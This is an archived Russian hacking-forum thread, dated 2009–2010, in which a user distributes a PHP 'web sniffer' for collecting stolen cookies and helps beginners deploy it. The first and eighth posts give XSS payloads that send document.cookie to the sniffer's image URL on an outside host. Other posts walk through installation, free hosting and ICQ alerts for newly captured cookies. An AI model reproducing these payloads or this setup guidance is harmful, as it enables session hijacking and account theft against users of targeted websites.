Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

FriLL Web Sniffer - быстро и просто

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> FriLL Web Sniffer - быстро и просто
Имя
Сообщение << Старые топики   Новые топики >>
FriLL Web Sniffer - быстро и просто - 2009-07-22 22:08:48.320000   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
Как выясняеться многие люди (как правило начинающие) сталкиваються с проблемой установки и настройки web - сниффера
Вообщем я написал удобный веб сниффер

Требования
1)PHP5
2)Apache2
3)поддержка .htaccess файлов

Процедура установки
1) запустить из адрессной строки install.php
2)проследовать инструкциям

install.php создает файл конфига, потом install.php лучше удалить

login.php - авторизация
out.php - логи сниффера
s.gif - картинка сниффер, можно поставить в подпись , можно на нее передавать cооkie через XSS
вот так http://site.commm/s.gif?c=document.cооkie
вообще про то как использовать XSS для перехвата cооkie я тут рассказывать не буду, так что забираем

Загрузка — http://rghost.ru/22544021

Все предложения/ошибки/проблемы писать сюда
Post #: 1
RE: FriLL Web Sniffer - быстро и просто - 2009-07-22 22:33:40.263333   
~SATANA of LOVE~

Сообщений: 745
Оценки: 0
Присоединился: 2009-01-13 22:08:53.046666
Может есть такой хостинг бесплатный??? Может кто такой подсказать?
Post #: 2
RE: FriLL Web Sniffer - быстро и просто - 2009-07-22 22:37:11.283333   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
Hostland.su насколько я помню
Post #: 3
RE: FriLL Web Sniffer - быстро и просто - 2009-07-22 22:39:02.716666   
~SATANA of LOVE~

Сообщений: 745
Оценки: 0
Присоединился: 2009-01-13 22:08:53.046666
Спасибо, попробую.
Post #: 4
RE: FriLL Web Sniffer - быстро и просто - 2009-07-23 21:58:08.716666   
shram2009

Сообщений: 13
Оценки: 0
Присоединился: 2009-07-21 23:48:02.136666
wallst.ru
Post #: 5
RE: FriLL Web Sniffer - быстро и просто - 2009-09-19 18:17:50.373333   
x0ti

Сообщений: 5
Оценки: 0
Присоединился: 2009-09-10 15:48:46.933333
quote:

ORIGINAL: FriLL

1) запустить из адрессной строки install.php
2)проследовать инструкциям


1)после введения во все поля install.php не куда не прошел
2)куда вставлять xss
Post #: 6
RE: FriLL Web Sniffer - быстро и просто - 2009-09-20 07:32:33.330000   
x0ti

Сообщений: 5
Оценки: 0
Присоединился: 2009-09-10 15:48:46.933333
~up
Post #: 7
RE: FriLL Web Sniffer - быстро и просто - 2009-09-20 12:51:51.273333   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
quote:

ORIGINAL: x0ti

quote:

ORIGINAL: FriLL

1) запустить из адрессной строки install.php
2)проследовать инструкциям


1)после введения во все поля install.php не куда не прошел
2)куда вставлять xss


1)install.php создает конфиг (config.php)
так что убедись чтобы были права на запись в папке

2) s.gif - картинка сниффер
на нее передавать cookie в виде

<sсriрt>img = new Image(); img.src =
"http://sniffffer.ru/s/s.gif?c="+document.cookie;</sсriрt>
если не понятно курим маны по XSS
Post #: 8
RE: FriLL Web Sniffer - быстро и просто - 2009-09-23 11:33:22.666666   
KerchNET

Сообщений: 143
Оценки: 0
Присоединился: 2008-08-21 10:55:05.630000
Фу! Объясните подробно как, что заливать ??? Я новичок!!
Post #: 9
RE: FriLL Web Sniffer - быстро и просто - 2009-12-21 13:23:24.930000   
index.php

Сообщений: 1
Оценки: 0
Присоединился: 2009-12-21 12:26:40.246666
quote:

ORIGINAL: KerchNET

Фу! Объясните подробно как, что заливать ??? Я новичок!!


ищешь хостинг бесплатный (www.freehostia.com например) с пхп и майскюльем,регистрируешься там,заливаешь на свой хост через фтп,то что тут выложили,
хостер тебе наверняка дал какой нибуть домен стремный,3го уровня, переходишь по нему пример - стремный.домент.ру/install.php
ну а дальше по инструкции….
&nbsp;

 
Post #: 10
RE: FriLL Web Sniffer - быстро и просто - 2009-12-26 00:18:54.840000   
VaZoNeZ

Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
Создал акк и залил на freehostia. Проинсталилось удачно - создался конфиг и добавилась таблица в базу. Но при переходе на гифку лог не пополняется - при заходе на out.php - пустая табличка, как будто заходов и небыло. На папку со снифом выставил 777. Чего ж еще ему надо?
// разобрался со снифером kanick'a

@Frill - может переделаешь его под юзание файла, а не БД? Было бы очень неплохо, т.к. у Кеника нету авторизации(
Post #: 11
RE: FriLL Web Sniffer - быстро и просто - 2009-12-26 14:58:38.323333   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
quote:

@Frill - может переделаешь его под юзание файла, а не БД?

в принципе конечно могу, использование БД задумавалось для упрощенного поиска
Будем работать))

ЗЫ
почему у тебя не работает незнаю, перепроверил у себя, все работает
Post #: 12
RE: FriLL Web Sniffer - быстро и просто - 2009-12-26 15:39:15.376666   
VaZoNeZ

Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
Будет клево, если будешь развивать свой сниф, а то Kanick пропал и пропала возможность купить делюкс версию.
Post #: 13
RE: FriLL Web Sniffer - быстро и просто - 2009-12-26 16:18:29.540000   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
quote:

Kanick пропал и пропала возможность купить делюкс версию.

Он еще умудрялся чтото продать?

Вообще есть такие идеи:
- использование одного сниффера для перехвата кукисов с разных сайтов (удобно, все в одном)
- оповещение на аську или мыло
Post #: 14
RE: FriLL Web Sniffer - быстро и просто - 2009-12-26 16:45:47.550000   
VaZoNeZ

Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
quote:

- оповещение на аську или мыло

Вот это зачетная идея!

Как выйдет поставить твой, то обязательно потестю)
Post #: 15
RE: FriLL Web Sniffer - быстро и просто - 2009-12-26 17:10:12.263333   
ISOTAPE

Сообщений: 71
Оценки: 0
Присоединился: 2009-12-24 17:43:04.770000
хорОша штука. спасибо.
Post #: 16
RE: FriLL Web Sniffer - быстро и просто - 2009-12-26 23:56:45.670000   
.Life

Сообщений: 38
Оценки: 0
Присоединился: 2009-12-26 17:27:01.510000
Спасибо, нужная вещь давно искал.
Особенно радует установка.
Post #: 17
RE: FriLL Web Sniffer - быстро и просто - 2009-12-29 21:53:00.830000   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
Итак по многочисенным просьбам выкладываю обновленный сниффер:
Из новшеств:

  • Отстук на аську о новой записи (параметры для аськи устанавливаються при установки в install.php)
  • Покончено с MySQL, теперь только файловые записи
  • Добавлен календарь для удобства использования
  • Прочие багфиксы

  • Тестим, отписываемся, качать по ссылке из первого поста
    Post #: 18
    RE: FriLL Web Sniffer - быстро и просто - 2009-12-29 22:24:34.440000   
    VaZoNeZ

    Сообщений: -6758
    Оценки: 0
    Присоединился: 2008-10-31 14:38:43.796666
    Нехватает:
    - Реверрера
    - Фильтра (или поиска) по IP и т.п.
    - По выбору - картинку с IP или прозрачную 1х1

    Это так, навскидку) Работает намного лучше, чем прошлая версия)

    Post #: 19
    RE: FriLL Web Sniffer - быстро и просто - 2009-12-30 22:16:38.340000   
    FriLL

    Сообщений: 2539
    Оценки: 335
    Присоединился: 2007-08-11 17:14:26.703333
    UP

  • Добавился поиск
  • Записываеться реферер
  • Появилась pic.gif - картинка 1x1

  • Post #: 20
    RE: FriLL Web Sniffer - быстро и просто - 2010-01-09 21:17:29.140000   
    newkinokz

    Сообщений: 1
    Оценки: 0
    Присоединился: 2010-01-09 21:03:15.796666
    Я установил Снифер , Куда вставлять пассивную xss ? Обьясните пожалуйсто по подробнее !
    Post #: 21
    RE: FriLL Web Sniffer - быстро и просто - 2010-01-09 21:19:41.960000   
    Pashkela

    Сообщений: 3756
    Оценки: 736
    Присоединился: 2007-01-03 06:19:40.900000
    quote:

    ORIGINAL: newkinokz

    Я установил Снифер , Куда вставлять пассивную xss ? Обьясните пожалуйсто по подробнее !


    В этом вся соль, уважаемый, вся суть взлома. В теме представлен лишь инструмент для пожинания плодов. Немного теории с нуля есть здесь:

    http://forum.xakep.ru/m_1298634/tm.htm
    Post #: 22
    RE: FriLL Web Sniffer - быстро и просто - 2010-01-10 11:35:02.986666   
    stabko

    Сообщений: 6
    Оценки: 0
    Присоединился: 2010-01-09 03:00:26.786666
    Уважаемые Админы и Модераторы (написатели этого полезного мануала) плиз просим вас все всместе разместите КОД с помощью которого юзвер попадется на наш сниффер)).Заранее вам благодарен!! мы все начинающие уже благодарим вас за этот прекрасный мануал и самое главное рабочий сниффер)Ждем от вас дальнейшей помощи!Плиз не посылать читать другие ссылки,так как кода там нет но расписаны основы его создания!
    Post #: 23
    RE: FriLL Web Sniffer - быстро и просто - 2010-01-10 16:42:06.966666   
    FriLL

    Сообщений: 2539
    Оценки: 335
    Присоединился: 2007-08-11 17:14:26.703333
    А что конкретно то не получаеться?
    Дaнные собирает pic.gif - http://Адресс_до_сниффера/pic.gif
    дальше заходим в адмику сниффера и смотрим что пришло
    Post #: 24
    RE: FriLL Web Sniffer - быстро и просто - 2010-01-10 20:24:36.240000   
    stabko

    Сообщений: 6
    Оценки: 0
    Присоединился: 2010-01-09 03:00:26.786666
    так в 1 посте написано что путь к снифйферу s.gif
    так вот поэтому я и написал тот пост))Спасибки вам FriLL !!пойду пробовать))
    Post #: 25
    RE: FriLL Web Sniffer - быстро и просто - 2010-01-10 20:38:55.046666   
    stabko

    Сообщений: 6
    Оценки: 0
    Присоединился: 2010-01-09 03:00:26.786666

    quote:

    ORIGINAL: FriLL

    А что конкретно то не получаеться?
    Дaнные собирает pic.gif - http://Адресс_до_сниффера/pic.gif
    дальше заходим в адмику сниффера и смотрим что пришло

    cходил я и по этому адресу,и потому адресу))у меня в админке вся таблица пустая!я нажимаю go! ничего не происходит ,я выбираю там день по календарю все равно ничего))как же мне быть дружище?
    Post #: 26
    RE: FriLL Web Sniffer - быстро и просто - 2010-01-10 20:40:50.513333   
    stabko

    Сообщений: 6
    Оценки: 0
    Присоединился: 2010-01-09 03:00:26.786666
    quote:

    ORIGINAL: VaZoNeZ

    Создал акк и залил на freehostia. Проинсталилось удачно - создался конфиг и добавилась таблица в базу. Но при переходе на гифку лог не пополняется - при заходе на out.php - пустая табличка, как будто заходов и небыло. На папку со снифом выставил 777. Чего ж еще ему надо?


    вот и у меня все тоже самое)))
    Post #: 27
    RE: FriLL Web Sniffer - быстро и просто - 2010-01-10 20:41:12.160000   
    FriLL

    Сообщений: 2539
    Оценки: 335
    Присоединился: 2007-08-11 17:14:26.703333
    Зайди http://Адресс_до_сниффера/s.gif
    Должна картинка с твоим ip появиться
    Post #: 28
    RE: FriLL Web Sniffer - быстро и просто - 2010-01-10 20:42:43.013333   
    stabko

    Сообщений: 6
    Оценки: 0
    Присоединился: 2010-01-09 03:00:26.786666

    quote:

    ORIGINAL: FriLL

    Зайди http://Адресс_до_сниффера/s.gif
    Должна картинка с твоим ip появиться

    да собствено и картинка сама не отображается))просто зарезервированое место под нее на котором написано изображение
    Post #: 29
    RE: FriLL Web Sniffer - быстро и просто - 2010-01-10 20:44:38.196666   
    stabko

    Сообщений: 6
    Оценки: 0
    Присоединился: 2010-01-09 03:00:26.786666
    я пробовал и до s и до pic)))результат тот же))дружище может тебе дать все логины и пароли и адреса??проверишь плиз))))хочется познать такие штучки))могу я тебе в аську постучать??я могбы скрины допустим сделать все что бы стало понятней
    Post #: 30
    RE: FriLL Web Sniffer - быстро и просто - 2010-02-11 19:10:28.746666   
    5k.NoBanSystem15

    Сообщений: 12
    Оценки: 0
    Присоединился: 2010-01-03 00:18:30.900000
    для данного снифа рекомендую redz.ru именно то что надо все указанные требования + домен 2го уровня + хост русский есть фтп даже самый безнадежный ламер разберется
    Post #: 31
    RE: FriLL Web Sniffer - быстро и просто - 2010-02-11 22:26:01.366666   
    FriLL

    Сообщений: 2539
    Оценки: 335
    Присоединился: 2007-08-11 17:14:26.703333

    quote:

    ORIGINAL: stabko

    quote:

    ORIGINAL: FriLL

    Зайди http://Адресс_до_сниффера/s.gif
    Должна картинка с твоим ip появиться

    да собствено и картинка сама не отображается))просто зарезервированое место под нее на котором написано изображение

    Скорее всего не установлена библиотека GD
    Post #: 32
    RE: FriLL Web Sniffer - быстро и просто - 2010-02-23 12:22:19.150000   
    Arecvien

    Сообщений: 2
    Оценки: 0
    Присоединился: 2010-02-23 12:16:15.240000
    Хотелось бы поблагодарить многоуважаемого FriLL-а за сниффер.
    Но есть небольшая проблема: ICQ-bot не работает почему-то, хотя все необходимые настройки были выполнены.
    В чем может быть проблема?
    Post #: 33
    RE: FriLL Web Sniffer - быстро и просто - 2010-02-23 12:51:56.263333   
    FriLL

    Сообщений: 2539
    Оценки: 335
    Присоединился: 2007-08-11 17:14:26.703333

    quote:

    ORIGINAL: Arecvien

    Хотелось бы поблагодарить многоуважаемого FriLL-а за сниффер.
    Но есть небольшая проблема: ICQ-bot не работает почему-то, хотя все необходимые настройки были выполнены.
    В чем может быть проблема?

    Откройте config.php и проверьте действительно ли там все заполнено
    Если честно я без понятий т.к. взял уже готовый класс для работы с ICQ
    Post #: 34
    RE: FriLL Web Sniffer - быстро и просто - 2010-02-23 14:58:15.506666   
    Arecvien

    Сообщений: 2
    Оценки: 0
    Присоединился: 2010-02-23 12:16:15.240000
    Хорошо.
    Хотелось бы узнать еще, это только у меня такая проблема или кто-то еще с этим столкнулся?
    Post #: 35
    RE: FriLL Web Sniffer - быстро и просто - 2010-05-09 20:10:26.483333   
    Moran

    Сообщений: 5
    Оценки: 0
    Присоединился: 2010-05-08 07:30:45.586666
    хз на freehostia не хочет работать =(( мб я руки кривые имею или еще че, админку создает, зайти можно, но логов чет не ма :( я на картинки сам гулял друзей звал результат-0
    исправляюсь все робит энто я хз че делаю
    Post #: 36
    RE: FriLL Web Sniffer - быстро и просто - 2010-06-19 12:22:05.753333   
    rammstein74

    Сообщений: 62
    Оценки: 0
    Присоединился: 2010-06-19 10:07:12.210000
    Спасибо, нужная вещь давно искал.
    Post #: 37
    RE: FriLL Web Sniffer - быстро и просто - 2010-06-20 21:08:37.160000   
    Stil Free 2

    Сообщений: 183
    Оценки: 0
    Присоединился: 2009-03-26 17:17:38.296666
    Тема то актуальна? Пол года прошла никакого развития…
    Post #: 38
    RE: FriLL Web Sniffer - быстро и просто - 2010-06-20 21:49:08.763333   
    Alex.Black

    Сообщений: 2113
    Оценки: 0
    Присоединился: 2010-04-08 00:23:20.663333
    quote:

    ORIGINAL: Stil Free 2

    Тема то актуальна? Пол года прошла никакого развития…

    Тема актуальна. Автору респект…
    Post #: 39
    RE: FriLL Web Sniffer - быстро и просто - 2010-06-20 22:36:46.286666   
    Webber22

    Сообщений: 16
    Оценки: 0
    Присоединился: 2010-06-19 21:59:26.880000
    Ну мне приходи IP и данные о браузере, а где сами куки, где пароли…??? Подскажите!
    Post #: 40
    Страниц:  [1] 2
    Все форумы >> [Для начинающих] >> FriLL Web Sniffer - быстро и просто







    Связаться:
    Вопросы по сайту / xakep@glc.ru

    Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.